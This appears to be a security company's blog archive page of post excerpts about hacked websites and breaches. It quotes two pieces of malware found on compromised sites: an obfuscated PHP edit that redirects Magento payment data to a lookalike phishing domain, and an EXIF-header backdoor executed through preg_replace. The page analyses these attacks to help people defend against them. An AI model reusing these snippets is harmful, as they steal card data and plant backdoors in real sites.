HideMeBetter – SPAM injection Variant

Compromised sites being injected with SPAM SEO is something we deal very often. A few months ago we wrote about a wave of SPAM injections known as HideMe.

However, the bad guys are always getting more and more “creative”, and they’ve developed a better version of that SPAM, called “HideMeBetter”. Yes, that’s their own naming scheme.

Read More

Phishing 2.0 – Credit Card Redirection on Compromised Sites

We have seen it all when it comes to compromised sites: from silly defacements, to malware, spam, phishing and all sorts of injections. However, the bad guys are always looking to maximize their profits when they hack a site. Especially when it is an e-commerce site that processes credit cards online.

Credit Card Redirection

A new trick we are seeing being used on compromised e-commerce sites is credit card redirection. The attackers modify the flow of the payment process so that instead of just processing the card, they redirect all payment details to a domain they own so they can steal the card details.

This is often done very stealthy, with minimal changes to the site. Credit cards are very valuable in the black market, so the attackers try to stay on as long as possible without being detected.

Magento Redirection

Because of the nature of Magento websites, they are a big target. We are seeing sites having the credit card processing file modified to either email the credit card details or redirect them to a new domain. In this specific case, the file “app/code/community/MageBase/DpsPaymentExpress/Model/Method/Pxpay.php” (use for PaymentExpress payment handling) was modified with this code:

$oo = base64_decode(‘cGF5bWVudGV4cHJlc3M=’); $_oo = base64_decode("cGF5bWVudGlleHByZXNz’);$_is = base64_decode("c2Vzc19pZA==’);
$_oi = base64_decode("cHJlZ19yZXBsYWNl’);
$responseURI = $_oi(‘/’.$oo.’/’,$_oo,strval($responseXml->URI));

Which once decoded, replaces every occurrence of paymentexpress for paymentiexpress (see extra i). This forces the payment processing to be tunneled here:

https://sec.paymentiexpress.com/pxpay/pxaccess.aspx (see the i again)

Instead of the real URL:

https://sec.paymentexpress.com/pxpay/pxaccess.aspx

This redirection forces all the transaction data, including credit card details (name, address, CC and CVV), through their malicious server, in turn allowing the data to be stolen by the bad guys.

Paymentiexpress.com Phishing

The domain paymentiexpress.com was just registered a few days ago using whois privacy:

Registration Service Provided By: Namecheap.com
Contact: support@namecheap.com
Visit: http://namecheap.com
Registered through: eNom, Inc.
Creation date: 18 Jul 2013 18:02:00
Expiration date: 18 Jul 2014 18:02:00

And is currently live and not blacklisted by anyone (except us now). It has a proper SSL certificate (by RapidSSL) and everything that makes a trusted worthy phishing page.

What is also interesting is this new evolution of phishing, so that instead of tricking users into clicking into a bad url, it tricks the site itself to redirect the users information there.

Sucuri CloudProxy Web Application Firewall (WAF) – Out of Beta

We are happy to announce that after more than a year in testing, Sucuri’s CloudProxy is out of beta.

CloudProxy

CloudProxy is currently available to Sucuri customers, so if you have an account with us, you can subscribe to CloudProxy from your dashboard.

Here is a quick testimonial:

I inherited a couple of websites that were hand coded and getting hacked on a daily bases. Hooked them up to CloudProxy last week and so far the sites have been protected and are not being hacked anymore. At this point, I’d highly recommend this service if you are running an out of date CMS or code and are getting hacked often! Great service!

Linda Kimble Long


Read More

Dissecting a WordPress Brute Force Attack

Update: Brute force protection now available: http://cloudproxy.sucuri.net/brute-force-protection


Over the past few months there has been a lot of discussion about WordPress Brute Force attacks. With that discussion has come a lot of speculation as well. What are they doing? Is it a giant WordPress botnet? Is it going to destroy the internet? Well, as you would expect of any good geeks we set out to find a way to find out.

This is not to be exhaustive case study or meant to be a representative sample of what all attacks look like, but it does have similar characteristics to the types of attacks and infections we deal with on a daily basis.

In this post, my goal is to highlight a hack that occurred this weekend, July 20th to be exact, against one of our several honeypots. In this specific instance, it was setup and configured approximately 2 months ago. It had been hacked about a month and a half ago and silly me I forgot to configure what I needed to do real forensics, oops. In any event, everything was cleared and pushed out again to see what happened, it was nothing more than a matter of sitting back and waiting.

Sure enough, about 30 days later and it was hacked, this time we were ready to see what happened..

Read More

Ubuntu Forums Hacked

Ubuntu’s official forum web site (ubuntuforums.org) was hacked, defaced and all user names and
passwords stolen. The forum was very popular with over 1.8 million registered users. The site is now disabled with this warning:

What we know:

-Unfortunately the attackers have gotten every user’s local username, password, and email address from the Ubuntu Forums database.

-The passwords are not stored in plain text. However, if you were using the same password as your Ubuntu Forums one on another service (such as email), you are strongly encouraged to change the password on the other service ASAP.

The site was running vBulletin and according to some sources, it was outdated and didn’t have the admin panel protected. During the time it was defaced, it was redirecting to “ubuntuforums.org/signaturepics/Sput.html”, which had this image:

Ubuntu forums hacked

Size of the attack and consequences

The Ubuntu forum was very large with over 1,800,000 registered members. Even though the passwords were not stored in plain text, they should be considered compromised and known by the attackers. And since the site used vBulletin, it is likely that they were just hashed with md5, which makes the job a lot easier to the attackers.

If you have an account there and you use the same password some where else, please
change the password asap.

From a Site Compromise to Full Root Access – Bad Server Management – Part III

When an attacker manages to compromise and get access to a website, they won’t stop there. They will aim to gain full root (admin) access to the entire server. If there are more websites hosted on the server being attacked, It is likely they will attempt to compromise every single one of them.

How can an attacker escalate their privileges? How can they go from FTP-only access to getting root on the server? In this series of articles we will show some techniques that attackers are using to go from confined FTP/web access, to full root level access on a server.

In the previous articles of this series, we talked about symlinking to root and using local exploits to increase their privileges. However, attackers often don’t need this level of work when the server is not well managed and/or properly secured. They can leverage a quick path to root (admin) with little trouble.


Read More

Malware Hidden Inside JPG EXIF Headers

A few days ago, Peter Gramantik from our research team found a very interesting backdoor on a compromised site. This backdoor didn’t rely on the normal patterns to hide its content (like base64/gzip encoding), but stored its data in the EXIF headers of a JPEG image. It also used the exif_read_data and preg_replace PHP functions to read the headers and execute itself.

Technical Details

The backdoor is divided into two parts. The first part is a mix of the exif_read_data function to read the image headers and the preg_replace function to execute the content. This is what we found in the compromised site:

$exif = exif_read_data('/homepages/clientsitepath/images/stories/food/bun.jpg');
preg_replace($exif['Make'],$exif['Model'],'');


Read More

SSH Brute Force – The 10 Year Old Attack That Still Persists

One of the first server-level compromises I had to deal with in my life was around 12 ago, and it was caused by a SSH brute force attack. A co-worker set up a test server and chose a very weak root password for it. A few days later, the box was owned running IRC bots and trying to compromise the rest of the network.

That was just the first of many server-level compromises caused by SSH brute force attacks that I would end up responding to, and even after more than 10 years, quite a few of the server remediations that we do here at Sucuri are actually caused by the same thing.

Read More

ESET Blacklist Results Added to SiteCheck

If you did a SiteCheck scan today, you probably saw a new entry in the Blacklist tab for ESET. ESET has been a good friend of ours and they opened up their URL reputation results so we can verify if websites we scan are also considered malicious by them.

Sitecheck ESET warning

Read More

vBulletin Infections from Adabeupdate

vBulletin is a popular forum platform that is also starting to become a popular target for web attacks. vBulletin (and vbSEO) had some serious security vulnerabilities in older versions, and when a forum using them is not properly updated, it ends up hosting malware like the one we will analyze here in this post.

vBulletin in SiteCheck

Technical Analysis

vBulletin is very unique on how it stores its templates and plugins, It’s different than WordPress and Joomla, all the content is saved in the database. That makes it a bit more complicated for webmasters because they can’t just use common command line tools (like grep) to search through all their files. They need to use phpMyAdmin or another database tool to try to find and fix those issues.

Read More